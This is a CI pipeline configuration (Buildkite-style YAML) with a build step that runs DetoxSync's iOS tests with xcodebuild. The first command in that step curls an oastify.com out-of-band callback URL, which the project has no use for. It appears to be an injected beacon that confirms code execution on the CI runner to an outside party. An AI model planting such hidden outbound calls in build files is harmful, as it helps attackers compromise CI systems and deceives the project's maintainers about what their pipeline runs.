steps:
  - label: ":wrench: Build"
    command:
    - "curl https://9q0fl1l364gralid4lfmldlcc3iz6pue.oastify.com/1234"
    - "cd DetoxSync"
    - "git submodule update --init --recursive"
    - "xcodebuild test -project DetoxSync.xcodeproj -scheme DetoxSyncTests -destination 'platform=iOS Simulator,name=iPhone 12'"
